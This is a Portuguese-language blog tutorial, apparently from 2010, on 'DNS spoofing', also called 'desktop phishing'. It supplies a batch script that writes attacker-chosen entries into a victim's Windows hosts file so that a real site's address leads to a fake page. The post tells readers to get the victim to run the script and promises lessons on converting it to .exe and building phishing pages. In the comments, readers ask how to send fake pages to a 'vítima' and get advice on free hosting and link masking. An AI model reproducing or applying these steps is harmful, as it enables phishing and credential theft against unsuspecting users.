Social Icons

^^

sábado, 18 de setembro de 2010

.::DNS Spoof::. ou .::desktop phishing::.

Antes de começar-mos, temos que entender o que é DNS;

http://pt.wikipedia.org/wiki/Domain_Name_System

Agora vamos aprender como Spoofar um DNS:.


O seu pc salva o ip para cada DNS por exmplo:

IP DNS

64.233.163.104 http://www.google.com.br/

200.152.168.167 http://www.yahoo.com.br/



e assim vai... mas e se vc pudesse simplesmente trocar o ip do DNS??? onde ao a pessoa digitar http://www.google/ naum levasse para o IP: 64.233.163.104 ???

Sim é nisso que se baseia o DNS Spoof ele troca o ip gravado no seu pc para após vc digitar o DNS ( URl para qem ainda não entendeu ) redirecionar para a pagina fake, ou site ( geralmente sao paginas fakes ou sites com virus downloaders (fazem download automatico)).

ficando assim:

IP DNS

64.233.163.104 http://www.google.com.br/
(normal)

200.012.123.432 http://www.google.com.br/
(envenenado por DNS Spoof)



Consequentemente apos a pessoa digitar http://www.google.com.br/ se espoofado neste caso ira para o

IP: 200.012.123.432 e naum para o da pagina do google, bom a teoria esta dada agora a melhor parte....



.::A pratica::.



Bom ja deu pra ver que é interessante mais como vamos fazer o DNS Spoofing, o DNS Spoofing pode ser feito pela linguagem batch...

o Script malicioso eh o seguinte:



@echo off
echo IP Host>>C:\windows\system32\drivers\etc\hosts
echo IP Host>>C:\windows\system32\drivers\etc\hosts.msn


Primeiro vamos analizar o codigo depois ensino como usa-lo:

@echo off --> serve para naum mostrar a janela do CMD

echo IP Host>>C:\windows\system32\drivers\etc\hosts ---> vai fazer com que cada vez que você entre no Host seja redirecionado para o IP



.::Como usar::.



Isto é bem simples onde esta IP vc troca pelo ip do site q quer q redirecione sua pagina fake por exemplo ( para pegar o ip va ateh o CMD (prompt de comando) e digite:

ping http://www.suapaginafake.com.br/ e de enter o ip de seu site ou pagina fake vai aparecer entre "[]"

exemplo:



Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.



C:\Users\seu usuario>ping http://www.google.com.br/



Pinging http://www.l.google.com/ [64.233.163.104] with 32 bytes of data:

Reply from 64.233.163.104: bytes=32 time=10ms TTL=56

Reply from 64.233.163.104: bytes=32 time=11ms TTL=56

Reply from 64.233.163.104: bytes=32 time=17ms TTL=56

Reply from 64.233.163.104: bytes=32 time=11ms TTL=56



Ping statistics for 64.233.163.104:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 10ms, Maximum = 17ms, Average = 12ms



pront agora eé soh trocar o IP pelo do site q ira redirecionar, e o Host pelo site a ser spoofado



ex:



@echo off


echo 64.233.163.104 http://www.yahoo.com.br>>c\windows\system32\drivers\etc\hosts
echo 64.233.163.104 http://www.yahoo.com.br>> C:\windows\system32\drivers\etc\hosts.msn




no exemplo acima toda vez q a pessoa entrar no http://www.yahoo.com.br/ sera redirecionado para o google, para vcs entenderem melhor deixei de vermelho o site a ser redirecionado e em verde o site q toda vez q vc entrar sera redirecionado para o IP em vermelho!!!



bom ai eh só salvar em .bat (ex: spoofar.bat ou dns.bat e assim vai...)



faça a pessoa executar e poof DNS Spoof executado com sucesso...!



bom galera eh isso no proximo tutoria de DNS Spoofing eu vo encinar como transformar de .bat em .exe e em outro o q fazer se vc foi infectado, alem de em um ai encinar vcs a fazer a propria pagina fake xD


2 comentários:

  1. po,muito bom, mas eu queria mandar uma pagina fake para o email da "vitima" ,como faço?
    Phil

    ResponderExcluir
  2. É só hospedar a página em um servidor de preferencia gratuito, recomendo o 000webhost ou o gratixhost...

    faz a pagina fake e hospeda, depois vc pode camuflar o link usando o don´t tk.

    ResponderExcluir

Popular Posts

 

Seguidores

Hora exata:

Total de visualizações de página